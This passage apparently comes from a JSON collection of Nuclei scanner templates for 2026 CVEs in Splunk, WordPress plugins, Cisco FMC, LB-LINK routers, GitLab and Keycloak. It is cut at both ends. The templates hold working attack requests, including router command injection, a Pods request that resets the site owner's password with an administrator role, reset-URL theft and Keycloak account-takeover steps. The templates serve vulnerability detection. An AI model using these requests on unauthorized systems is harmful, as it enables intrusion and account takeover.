10.4.2604.3 and 10.2.2510.14, an unauthenticated user could create or truncate arbitrary files through a PostgreSQL sidecar service endpoint.<br><br>The vulnerability exists because the PostgreSQL sidecar service endpoint lacks authentication controls, allowing any network-reachable user to invoke file operations without credentials.\n  impact: |\n    Unauthenticated attackers can create or truncate arbitrary files, potentially leading to data loss or system compromise.\n  remediation: |\n    Upgrade to Splunk Enterprise 10.2.4, 10.0.7 and Splunk Cloud Platform 10.4.2604.3, 10.2.2510.14 or later.\n  reference:\n    - https://labs.watchtowr.com/why-use-app-level-auth-when-every-database-has-auth-splunk-enterprise-cve-2026-20253-pre-auth-rce/\n    - https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253/blob/main/watchTowr-vs-Splunk-CVE-2026-20253.py\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"enterprise\" && body=\"splunk\"\n  tags: cve,cve2026,splunk,postgres,backup,vkev,kev\n\nhttp:\n  - raw:\n      - |\n        POST /{{region}}/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic ZGFnOg==\n\n    payloads:\n      region:\n        - \"en-US\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Failed to decode\"\n\n      - type: status\n        status:\n          - 400\n# digest: 490a0046304402201da430780814d7865c4b2fcab64e649e06b260eac684ea5f5860ea46bc4dd3030220433b9e7f6979eecf0350f43d916747e20ab31f1620f4875672d5f25a8c6831a1:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-20253.yaml","vuln_id":"cve-2026-20253"},{"raw":"id: CVE-2026-2025\n\ninfo:\n  name: Mail Mint < 1.19.5 - Unauthenticated Email Disclosure\n  author: 0x_Akoko\n  severity: high\n  description: |\n    Mail Mint WordPress plugin < 1.19.5 contains an information disclosure vulnerability caused by lack of authorization in a REST API endpoint, letting unauthenticated users retrieve email addresses of blog users, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can retrieve email addresses of users, leading to privacy breaches and potential phishing attacks.\n  remediation: |\n    Update to version 1.19.5 or later.\n  reference:\n    - https://wpscan.com/vulnerability/1b815cde-cd9d-46fa-a6ab-3d2851705e7b/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2025\n    - https://wordpress.org/plugins/mail-mint/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-2025\n    epss-score: 0.01538\n    epss-percentile: 0.7376\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: mail-mint\n    product: mail-mint\n    fofa-query: body=\"/wp-content/plugins/mail-mint/\"\n  tags: cve,cve2026,wordpress,wp-plugin,mail-mint,exposure,unauth,vuln,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/mrm/v1/wp/admins?term=@\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"admins\\\"\", \"\\\"label\\\"\", \"@\")'\n        condition: and\n# digest: 4a0a0047304502200bb6abe52a9bd9051c0c2249c350ea549cc6523964bb922b503eefde9631e26f022100ba82f3da747b4d3701ebc11ea028623b39e7951e9d0bfd7ec539ff67597a3a29:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-2025.yaml","vuln_id":"cve-2026-2025"},{"raw":"id: CVE-2026-20079\n\ninfo:\n  name: Cisco Secure Firewall Management Center - Authentication Bypass\n  author: theamanrawat\n  severity: critical\n  description: |\n    Cisco Secure Firewall Management Center Software contains an authentication bypass caused by improper system process creation at boot, letting unauthenticated remote attackers execute scripts and gain root access, exploit requires crafted HTTP requests.\n  impact: |\n    Unauthenticated remote attackers can gain root access by executing scripts, leading to full system compromise.\n  remediation: |\n    Update to the latest available version.\n  reference:\n    - https://www.vulncheck.com/blog/cisco-fmc-auth-bypass-cve-2026-20079\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-20079\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2026-20079\n    epss-score: 0.75752\n    epss-percentile: 0.99499\n    cwe-id: CWE-288\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"BackdraftSyncIntegration\"\n  tags: cve,cve2026,cisco,fmc,auth-bypass,rce,unauth,kev,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /help/about.cgi HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n          - 'contains(body, \"Invalid session ID\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /help/about.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: CGISESSID=csm_processes\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"Cisco Secure Firewall Management Center\", \"Model\", \"OS\", \"Hostname\")'\n        condition: and\n# digest: 4a0a0047304502200b2ff2857317a3e46229700b840bd44052618a7e745b107fb4ba008cfba925a7022100904412dff07d19b1474eb4fcd83762758b85df4da5fc523e4c97e5278840cafc:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-20079.yaml","vuln_id":"cve-2026-20079"},{"raw":"id: CVE-2026-19900\n\ninfo:\n  name: LB-LINK Routers - Unauthenticated Command Injection\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    LB-LINK X-PRO 1.0.22-20231206 contains a hardcoded credentials vulnerability caused by manipulation of an unknown function in /etc/shadow, letting remote attackers use hardcoded credentials, exploit requires high complexity\n  impact: |\n    Remote attackers can use hardcoded credentials to gain unauthorized access, potentially compromising the system.\n  remediation: |\n    Update to the latest version or contact vendor for a patch.\n  reference:\n    - https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_cmd%20Indicates%20the%20unauthorized%20command%20injection/The%20LB-LINK_cmd%20command%20is%20used%20to%20inject%20information.md\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-19900\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-19900\n    epss-score: 0.02243\n    epss-percentile: 0.82109\n    cwe-id: CWE-77\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: lb-link\n    product: bl-wr9000_firmware\n    fofa-query: body=\"goform\" && body=\"LB-LINK\"\n    shodan-query: http.html:\"LB-LINK\" \"GoAhead-Webs\"\n  tags: cve,cve2026,lb-link,router,rce,iot,unauth,cmdi\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(header), \"goahead\")'\n          - 'contains_any(tolower(body), \"lb-link\", \"goform\", \"/login.asp\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /goform/set_cmd HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        cmd=echo+{{randstr}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(header, \"GoAhead\")'\n          - 'contains_all(body, \"\\\"type\\\":\\\"setcmd\\\"\", \"\\\"cmdinfo\\\":\\\"{{randstr}}\")'\n        condition: and\n# digest: 4a0a00473045022029a557a069e061c8e8731d8302f4467561685274fc95ed0af85c1f950299b097022100965b4dfbd3890504e6c944a6f7349e9f032f58837aa6b651c37ea46e130fbc1b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-19900.yaml","vuln_id":"cve-2026-19900"},{"raw":"id: CVE-2026-1980\n\ninfo:\n  name: WPBookit <= 1.0.8 - Unauthenticated Customer Information Disclosure\n  author: aryu-ru\n  severity: medium\n  description: |\n    WPBookit WordPress plugin <= 1.0.8 contains an information disclosure vulnerability caused by missing authorization check on 'get_customer_list' route, letting unauthenticated attackers retrieve sensitive customer data.\n  impact: |\n    Unauthenticated attackers can access sensitive customer information, risking privacy and data exposure.\n  remediation: |\n    Update to the latest version beyond 1.0.8.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1867c79-29d7-46a4-bfaf-c65e8a44c2ed?source=cve\n    - https://plugins.trac.wordpress.org/browser/wpbookit/tags/1.0.8/core/admin/classes/class.wpb-admin-routes.php#L146\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-1980\n    - https://wordpress.org/plugins/wpbookit/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-1980\n    epss-score: 0.00829\n    epss-percentile: 0.5597\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: iqonicdesign\n    product: wpbookit\n    publicwww-query: \"/wp-content/plugins/wpbookit/\"\n    fofa-query: body=\"/wp-content/plugins/wpbookit/\"\n  tags: cve,cve2026,wordpress,wp-plugin,wpbookit,unauth,disclosure\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WPBookit\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lsversion\n        group: 1\n        internal: true\n        regex:\n          - '(?i)Stable tag:\\s*([\\w.]+)'\n\n  - raw:\n      - |\n        GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&length=1&start=0 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"recordsTotal\", \"recordsFiltered\", \"user_registred\")'\n          - 'compare_versions(lsversion, \">= 1.0\", \"<= 1.0.8\")'\n        condition: and\n# digest: 4a0a0047304502205f00008d6d6554024fc89b36ab29da2b57639732f44721a00c799e6fb97340c7022100c250d586062db0a5120671715a51caf9df275ce3845d0817cf154f4fd49d7576:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-1980.yaml","vuln_id":"cve-2026-1980"},{"raw":"id: CVE-2026-19632\n\ninfo:\n  name: TranslatePress <= 3.3.1 - Unauthenticated Account Takeover\n  author: 0xgh057r3c0n\n  severity: critical\n  description: |\n    TranslatePress WordPress plugin <= 3.3.1 contains a sensitive information exposure caused by the 'trp_get_translations_regular' AJAX action saving password-reset URLs in translation dictionary, letting unauthenticated attackers extract admin password-reset URLs, exploit requires automatic string saving enabled and admin profile locale set to a published secondary language.\n  impact: |\n    Unauthenticated attackers can obtain admin password-reset URLs, enabling full administrator account takeover.\n  remediation: |\n    Update to a version later than 3.3.1 or the latest available version\n  reference:\n    - https://wordpress.org/plugins/translatepress-multilingual/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-19632\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-19632\n    epss-score: 0.02493\n    epss-percentile: 0.83951\n    cwe-id: CWE-640\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: cozmoslabs\n    product: translatepress-multilingual\n    framework: wordpress\n  tags: cve,cve2026,wordpress,wp-plugin,translatepress,account-takeover,intrusive,vkev\n\nvariables:\n  username: \"admin\"\n\nflow: |\n  http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: langpath\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '<link rel=\"alternate\" hreflang=\"[a-z]{2}-[A-Z]{2}\" href=\"https?://[^/\"]+(/[a-z]{2,5}/)\"'\n\n  - raw:\n      - |\n        GET {{langpath}} HTTP/1.1\n        Host: {{Hostname}}\n\n    extractors:\n      - type: regex\n        name: nonce\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - 'gettranslationsnonceregular\"\\s*:\\s*\"([a-f0-9]+)\"'\n\n      - type: regex\n        name: language\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - 'trp_current_language\"\\s*:\\s*\"([a-zA-Z_]+)\"'\n\n  - raw:\n      - |\n        POST /wp-login.php?action=lostpassword HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        user_login={{username}}&redirect_to=&wp-submit=Get+New+Password\n\n    matchers:\n      - type: status\n        status:\n          - 200\n          - 302\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        X-Requested-With: XMLHttpRequest\n\n        action=trp_get_translations_regular&security={{nonce}}&language={{language}}&all_languages=true&dynamic_strings=true&skip_machine_translation=[]&string_ids=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,866,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,899,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,918,919,920,921,922,923,924,925,926,927,928,929,930,931,932,933,934,935,936,937,938,939,940,941,942,943,944,945,946,947,948,949,950,951,952,953,954,955,956,957,958,959,960,961,962,963,964,965,966,967,968,969,970,971,972,973,974,975,976,977,978,979,980,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996,997,998,999,1000]\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - 'wp-login\\.php\\?[^\"\\\\\\s]*action=rp[^\"\\\\\\s]*key=[A-Za-z0-9]{20,}'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100babfa2b1b23b3caf0f00c74fd7a9d22a220ea7edf35bd86261d8e19c27ddf2d5022012aadbc950b875e52dae8048a4fcd26c948962bfe53a48cd0a78a13651a10108:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-19632.yaml","vuln_id":"cve-2026-19632"},{"raw":"id: CVE-2026-19598\n\ninfo:\n  name: Pods <= 3.3.9 - Unauthenticated Privilege Escalation via pods_admin AJAX Router\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Privilege Escalation via Authorization Bypass in all versions up to, and including, 3.3.9. The vulnerability exists because the pods_admin AJAX router funnels every access check — including the method allowlist, nonce verification, login enforcement, and capability gate — through pods_error(), which under the JSON meta-box-loader compatibility path only writes failures to the PHP error log and returns false instead of terminating the request, rendering all guards ineffective. This makes it possible for unauthenticated attackers to escalate their privileges to Administrator or overwrite the password of any user account, including the site owner's, enabling complete site takeover, or perform another administrator action.\n  impact: |\n    Unauthenticated attackers can escalate to administrator or overwrite any user password, enabling full site takeover.\n  remediation: |\n    Update to the latest version beyond 3.3.9.\n  reference:\n    - https://www.wordfence.com/blog/2026/08/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-pods-wordpress-plugin/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-19598\n    - https://pods.io/2026/08/14/pods-3-3-9-1-security-release-and-backported-releases/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-19598\n    cwe-id: CWE-863\n    epss-score: 0.02791\n    epss-percentile: 0.85801\n  metadata:\n    max-request: 2\n    verified: true\n    product: pods\n    vendor: podsfoundation\n  tags: cve,cve2026,wordpress,wp-plugin,pods,privesc,unauth,intrusive,vkev\n\nvariables:\n  passwd: \"{{to_lower(rand_text_alpha(12))}}\"\n  email: \"{{to_lower(rand_text_alpha(8))}}@pods.nuclei\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?meta-box-loader=1 HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n        X-Requested-With: XMLHttpRequest\n        Content-Type: application/x-www-form-urlencoded\n\n        action=pods_admin&method=save_user&ID=1&user_pass={{passwd}}&user_email={{email}}&role=administrator\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"content_length <= 3\"\n          - \"contains(body, '1')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log={{email}}&pwd={{passwd}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(to_lower(header), 'wordpress_logged_in')\"\n# digest: 4a0a00473045022100ea848cf61f92b420aed9c0cb0d5e22df59732767aa9621ae0b59ceee54c26f21022042d18643183bf4b9effc9d6c8c77d2abd50d31d25ff340b6c684fa590641ee6f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-19598.yaml","vuln_id":"cve-2026-19598"},{"raw":"id: CVE-2026-19478\n\ninfo:\n  name: GitLab CE/EE - GraphQL @gl_introduced Arbitrary Method Invocation\n  author: 0x_Akoko,DhiyaneshDk\n  severity: critical\n  description: |\n    GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.11.11, 19.0 before 19.0.8, 19.1 before 19.1.6, and 19.2 before 19.2.4 that under certain conditions could allow an unauthenticated user to remotely modify or delete public projects and user data via a GraphQL directive.\n  impact: |\n    An unauthenticated attacker can remotely modify or delete public projects and user data via arbitrary method invocation\n    through a crafted GraphQL query.\n  remediation: |\n    Upgrade GitLab to version 18.11.11, 19.0.8, 19.1.6, or 19.2.4 or later.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-19478\n    - https://github.com/davkharrr/CVE-2026-19478-PoC\n    - https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-2-4-released/\n    - https://gitlab.com/gitlab-org/gitlab/-/work_items/611377\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H\n    cvss-score: 9.4\n    cve-id: CVE-2026-19478\n    epss-score: 0.05811\n    epss-percentile: 0.92799\n    cwe-id: CWE-94\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: gitlab\n    product: gitlab\n    shodan-query: http.title:\"GitLab\"\n    fofa-query: title=\"gitlab\"\n    google-query: intitle:\"gitlab\"\n  tags: cve,cve2026,gitlab,graphql,code-injection,unauth,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/v4/projects?visibility=public&per_page=1\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'path_with_namespace')\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: project_path\n        group: 1\n        regex:\n          - '\"path_with_namespace\"\\s*:\\s*\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /api/graphql HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"query\":\"query { project(fullPath: \\\"{{project_path}}\\\") { name touch @gl_introduced(version: \\\"999.0.0\\\") } }\"}\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: word\n        part: body\n        words:\n          - \"doesn't exist on type\"\n        negative: true\n\n      - type: regex\n        part: body\n        regex:\n          - '\"touch\"\\s*:\\s*true'\n\n    extractors:\n      - type: json\n        json:\n          - '.data.project.name'\n# digest: 4b0a00483046022100a9fa486e784df10a3222180a721eca4bb3663c0d0a4e8d0c95a9fc85550c2532022100f6501d7be787ded1c0515ae07eb9667c5e7f7dd7bc7ef15a3fbda0549aaf7994:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-19478.yaml","vuln_id":"cve-2026-19478"},{"raw":"id: CVE-2026-19092\n\ninfo:\n  name: Tutor LMS < 4.0.6 - Unauthenticated Arbitrary PHP Function Invocation\n  author: aryu-ru\n  severity: critical\n  description: |\n    Tutor LMS WordPress plugin < 4.0.6 contains a template injection caused by insufficient prevention of request data overwriting internal variables during template rendering, letting unauthenticated attackers invoke arbitrary zero-argument PHP functions and receive their output.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP functions and obtain their output, potentially leading to information disclosure or further exploitation.\n  remediation: |\n    Update to version 4.0.6 or later.\n  reference:\n    - https://wpscan.com/vulnerability/da7fb4c7-6d07-4c96-bde2-95bca1797d56/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-19092\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-19092\n    epss-score: 0.01498\n    epss-percentile: 0.73104\n    cwe-id: CWE-74\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: themeum\n    product: tutor_lms\n    framework: wordpress\n    shodan-query: html:\"/wp-content/plugins/tutor/\"\n    fofa-query: body=\"/wp-content/plugins/tutor/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,tutor-lms,rce,unauth\n\nvariables:\n  ctx: \"{{rand_base(8, 'abcdefghijklmnopqrstuvwxyz')}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"_tutor_nonce\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: nonce\n        group: 1\n        internal: true\n        regex:\n          - '\"_tutor_nonce\":\"([a-z0-9]+)\"'\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=tutor_course_filter_ajax&_tutor_nonce={{nonce}}&template=single-content-loader&data[context]={{ctx}}&data[method_map][{{ctx}}]=phpinfo\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"success\\\":true\", \"PHP Extension Build\", \"Configuration File (php.ini) Path\", \"allow_url_fopen\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - 'PHP Version ([0-9]+\\.[0-9]+\\.[0-9]+)'\n# digest: 4b0a004830460221008f976c684dfecb9f84cf7d6c6fcee53f49421cabe874d8dfc1c58dc18ff1c64f022100990f9f570074cbd2ef595482cb617ab16f331b802e231a241628fbe1fe03e925:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-19092.yaml","vuln_id":"cve-2026-19092"},{"raw":"id: CVE-2026-18963\n\ninfo:\n  name: Keycloak < 26.7.2 - Unauthenticated Account Takeover via Reset-Credentials Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Keycloak versions prior to 26.7.2, 26.6.6, and 26.4.15 contain a flaw in the reset-credentials flow that allows an unauthenticated attacker to bypass email verification and take over any user account. Two bugs are chained: (1) the tryAnotherWay handler stores a generic \"true\" selector note not scoped to the execution ID, and (2) ResetCredentialEmail.action() calls context.success() without verifying ACTION_TOKEN_USER_ID.\n  impact: |\n    An unauthenticated remote attacker can force the password reset process for any user without clicking the email verification link, resulting in full account takeover.\n  remediation: |\n    Upgrade to Keycloak 26.7.2, 26.6.6, or 26.4.15 which include fix PR #51844. Temporary mitigation: disable \"Forgot Password\" in all realms.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-18963\n    - https://github.com/keycloak/keycloak/pull/51844\n    - https://github.com/keycloak/keycloak/issues/51833\n    - https://github.com/T0w0T/POC-CVE-2026-18963\n    - https://access.redhat.com/security/cve/cve-2026-18963\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-18963\n    epss-score: 0.03177\n    epss-percentile: 0.87481\n    cwe-id: CWE-640\n  metadata:\n    verified: true\n    max-request: 7\n    vendor: keycloak\n    product: keycloak\n    shodan-query: http.title:\"Sign in to Keycloak\" || http.title:\"Log in to Keycloak\"\n    fofa-query: title=\"Sign in to Keycloak\" || title=\"Log in to Keycloak\"\n  tags: cve,cve2026,keycloak,auth-bypass,account-takeover,critical,vkev\n\nvariables:\n  username: admin\n  realm: master\n\nflow: |\n  http(\"step-1\");\n  http(\"step-2\");\n  http(\"step-3\");\n  http(\"step-4\");\n  typeof restart_path !== \"undefined\" && restart_path !== \"\" && http(\"step-5\");\n  http(\"step-6\");\n  http(\"step-7\");\n\nhttp:\n  - id: step-1\n    raw:\n      - |\n        GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=account&response_type=code&scope=openid&redirect_uri={{BaseURL}}/realms/{{realm}}/account HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    extractors:\n      - type: regex\n        name: forgot_path\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - 'href=\"(?:https?://[^/]+)?(/[^\"]*reset-credentials[^\"]*)\"'\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: step-2\n    raw:\n      - |\n        GET {{replace(forgot_path,\"&amp;\",\"&\")}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n    max-redirects: 3\n\n    extractors:\n      - type: regex\n        name: reset_form_action\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - 'id=\"kc-reset-password-form\"[^>]*action=\"(?:https?://[^/]+)?(/[^\"]*)\"'\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: step-3\n    raw:\n      - |\n        POST {{replace(reset_form_action,\"&amp;\",\"&\")}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: 